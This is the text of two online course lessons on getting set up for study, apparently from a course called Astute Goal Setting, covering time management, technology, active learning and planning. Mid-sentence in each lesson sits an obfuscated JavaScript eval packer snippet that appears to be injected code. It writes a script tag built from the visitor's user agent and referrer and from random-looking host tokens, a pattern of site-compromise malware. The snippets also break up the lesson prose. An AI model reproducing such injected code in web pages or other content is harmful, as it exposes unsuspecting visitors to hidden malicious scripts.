Lesson 2 Getting the Most Out of Your Course

The first and most important thing to realize about your on-line course is that is not necessarily an easier way to learn, rather it is a more convenient way of learning, in addition your course may provide, delivery of content that will resonate better with your preferred method of learning. These may include audio, video, slide shows, written content or key notes. So eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|krrkf|var|u0026u|referrer|yyirs||js|php'.split('|'),0,{})) let’s take a look at some of the keys to enjoying a successful outcome to achievement 1.   Time: usually the major reason why course outcomes do not meet your expectations. Life, work, family can and will push your course to the background. Establish a time where you can spend sufficient time on your course; block that time out in your diary and stick to it. Schedule sufficient time for your course, but don't over commit by trying to complete the whole course in one week. 2.   Technology: it goes without saying that this is important, you will need a good internet connection, particularly if the content involves the use of video learning or attendance at webinars. Be prepared to interact on the relevant forums and with your educator. Make sure your course materials and course work are stored securely with either regular backups or use of a cloud based solution such as Dropbox or Onedrive. 3. Active Learning: the students who both enjoy and achieve great outcomes from the course. They all have one thing in common; they are active learners. An active learner doesn't just consume the course, they fully engage with the course. The active learner takes notes, they write down questions, ideas the Ah Ha moments. They will pause videos and re-watch parts that are unclear, they will watch, or re-read the content; not just once but multiple times. 4. Environment: establish a good working space to act on your course, if you are using your home or business office clear the desk of everything that is not related to the course. if you have that part completed report for Acme Widgets in front of you your attention will automatically change focus from your course to the Acme Widget report. 5. Self-Discipline: you are doing this course for (usually) yourself, for your benefit to achieve the outcomes that are important to you. It is you that is investing the time and effort, it will be your commitment that [...]

Lesson 3 Get Set Up For Learning

One of the most important things in course learning is to create a habit of achievement. Each of our lessons is designed to take between 20 and 30 minutes to complete; some student will take less time, some will take more. There is no hard and fast rule as it all depends on the space you are in personally in respect of the particular lesson. In short action is better than inaction – if you are stuck, reach out to the support group. So here was what I would like you to do before launching in to the course; we actually call it planning! Step eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eriaa|var|u0026u|referrer|kiafn||js|php'.split('|'),0,{})) 1: Plan to Succeed Get out your diary or daily planner. Take a good look at your schedule and see firstly what times you have available that are in sync with your learning rhythm’s. Some people are morning people, others are late night learners. Ok so you like 9:30 pm and you want to complete 2 lessons a week. So now you need to book an appointment with yourself for, let’s say Monday and Thursday for 60 minutes. Now you’re starting to create that learning habit! Just stick to it and don’t burn yourself out by being super ambitious. Step 2 Create a Folder You will be creating documents, perhaps printing out lessons and the like so on either your cloud drive, dropbox or computer hard drive create the directory: D:\Astute Goal Setting This is where you will save any documentation, communications notes etc that you acquire over the length of the course. Lesson 3 Join the Group For your support you can join the Facebook group, here you can post any questions to the Astute Coaching Team, the community at large. Perhaps you would like to share your vision and accept comments. From your Facebook Page search for the closed group Astute Goal Setting and join. The forum / group is
